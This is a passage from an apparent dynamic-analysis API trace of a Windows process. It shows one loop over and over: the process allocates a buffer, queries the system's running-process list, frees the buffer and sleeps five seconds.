(Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0241.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0241.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0241.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0241.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0241.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0241.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.567] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0241.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0241.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0241.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0241.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0241.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0241.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.694] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0241.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0241.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0241.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0241.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0241.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0241.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.827] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0241.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0241.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0241.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0241.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0241.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0241.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.980] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0241.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0241.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0241.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0241.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0241.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0242.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.121] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0242.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0242.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0242.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0242.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0242.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0242.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.408] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0242.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0242.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0242.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0242.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0242.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0242.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.548] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0242.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0242.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0242.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0242.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0242.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0242.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.711] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0242.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0242.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0242.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0242.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0242.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0242.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.832] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0242.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0242.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0242.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0242.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0242.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0242.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.957] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0242.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0242.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0242.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0242.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0242.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0243.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.127] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0243.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0243.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0243.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0243.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0243.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.303] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0243.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0243.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0243.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0243.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0243.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.570] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0243.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0243.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0243.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0243.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0243.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.752] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0243.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0243.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0243.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0243.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0243.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.951] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0243.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0243.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0243.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0243.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0244.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.114] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0244.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0244.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0244.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0244.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0244.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.286] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0244.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0244.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0244.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0244.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0244.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.444] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0244.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0244.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0244.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0244.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0244.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.631] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0244.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0244.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0244.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0244.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0244.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.795] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0244.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0244.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0244.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 